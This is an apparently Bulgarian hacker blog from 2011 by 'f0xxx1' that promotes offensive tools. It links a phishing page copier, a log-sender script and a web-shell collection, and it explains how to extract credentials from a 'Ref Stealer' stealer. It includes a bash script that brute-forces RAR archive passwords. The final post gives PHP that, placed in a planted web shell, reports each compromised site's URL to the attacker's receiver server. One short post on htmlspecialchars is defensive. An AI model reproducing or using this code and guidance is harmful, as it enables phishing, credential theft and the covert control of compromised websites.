foxxx

Copyway 2.0.1

f0xxx1 — Sun, 04 Sep 2011 21:19:06 +0000

Това е моя проект за копиране на страници фишинг http://pastebin.com/zJvSNYhT Copyway 2.0.1

Какво прави държавата в момента.

f0xxx1 — Fri, 26 Aug 2011 12:02:43 +0000

http://zamunda.net/details.php?id=253109&hit=1

Тук се обяснява защо вече трябва да бъдем анонимни.Защото държавата знае във всеки 1 момент къде сте с кой говорите колко времете на компюътра какво правите дори ако сте в тоалетната или където и да било всичко се записва.

Какво е BruteForce?

f0xxx1 — Thu, 25 Aug 2011 22:28:42 +0000

BruteForce е метода на познаването:

bruteforce на парола – имате 1 wordlist(лист с пароли) имате скрипт(скрипта ползва wordlist-a)

bruteforce на страница – искате да узнаете всички страници на сървъра като index.php / config.php и така нататък пак ви е нужен wordlist и скрипт който го изпълзва.

Това представлява BruteForce.

Bruteforce скрипта може да бъде написан на програмен език като C/C++/AutoIT/PHP/Perl/Python и др. тези са най-използваните.

Logs Sender / Изпращане на логове [Combofix,PHP]

f0xxx1 — Mon, 22 Aug 2011 17:16:27 +0000

http://pastebin.com/WPaSqsdC
-Max secured. // Максимално защитен
-Logs handler // Показване на логовете
-1 MB per IP /TRAFFIC/ // 1 мб се полага на всяко IP

формата е *.f0xxx1 чете се с Notepad/Browser.

Как да копираме сайт [цяла статия подробно.]

f0xxx1 — Mon, 22 Aug 2011 10:33:09 +0000

http://uppit.com/885cdie0t976/STATIQ.rar
Съдържание:
Video.avi [1440x900]
script.php [PHP Script-a]
phisher.txt [основни настройки]

Какво е Shell ?

f0xxx1 — Sun, 21 Aug 2011 14:21:49 +0000

Знаете компютърните вируси това е същото само че за уеб сайт. Той позволява достъпа до всички файлове на сървъра където е сложен , можете да видите през него IP адрес на сървъра , версия на кернела и други.С времето се усъвършенства и в него има encoder ФТП брутфорс и всякакви такива. Известни имена на шелове са c99 , r57 , c100.

Ето линк със много шелове: http://r57.gen.tr/

Ref Stealer v1.2 взимане на паролата и емайла от сървъра.

f0xxx1 — Sat, 20 Aug 2011 22:09:07 +0000

Трябва ви програмата BinText така цъкате на Browse избирате файла на Ref Stealer т.е. сървъра му и цъкате Go. Вижте доло има бутон Find до него напишете “ @ “ и натиснете Find , резултата би трябвало да е неговия email ,а до емайла се намира и неговата парола.

П.С. Ето линк за Ref Stealer: http://uppit.com/v/WDVKHI97

RAR познаване на паролата на BASH

f0xxx1 — Sat, 20 Aug 2011 21:27:42 +0000

Ето скрипт който bruteforce-ва паролата на RAR архив

counter=0
IFS=’
‘
for i in `cat paroli.txt`;
do
unrar t -p“$i“ rar_archive.rar > /dev/null 2>&1
stat=$?
if [ $stat -eq 0 ]; then
echo „Parolata e: $i“
echo „Namira se na red $counter v dictionary faila“
exit $stat
fi
let counter+=1
done
echo
echo Count: $counter
exit $stat

Как се защитават header-ите.

f0xxx1 — Sat, 20 Aug 2011 12:56:56 +0000

Обикновенно сайтовете имат логери в които записват данни от вашите header-и като cookie , user-agent , connection и така нататък сега ето как се защитават тези данни: С функцията htmlspecialchars(ТУК HEADER-A); примерно htmlspecialchars($_SERVER['HTTP_USER_AGENT']);

Заразяване на shell втори метод.

f0xxx1 — Fri, 19 Aug 2011 23:29:18 +0000

За целта ни трябват 2 сървъра 1ния ще приема нашата заявка другия ще я изпраща , този който ще я изпраща ще бъде shell-a ,а този който я приема ще бъде нашият сървър,добре ето кода за приемника:

$myFile = „SHELLS.txt“;
$fh = fopen($myFile, ‘w’) or die(„can’t open file“);
$stringData = $_GET['url'];
fwrite($fh, $stringData);
fclose($fh);
?>

а това е кода който трябва да сложите в шела:

$a = „http://“.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
file_get_contents(„ТУК СЛОЖЕТЕ САЙТА НА КОЙТО Е ПРИЕМНИКА А ?url не го променяйте ?url=$a“);
?>

Това е просто слагате кода нагласяте приемника и гледате SHELLS.txt в сървъра на приемника как се пълни със шелове .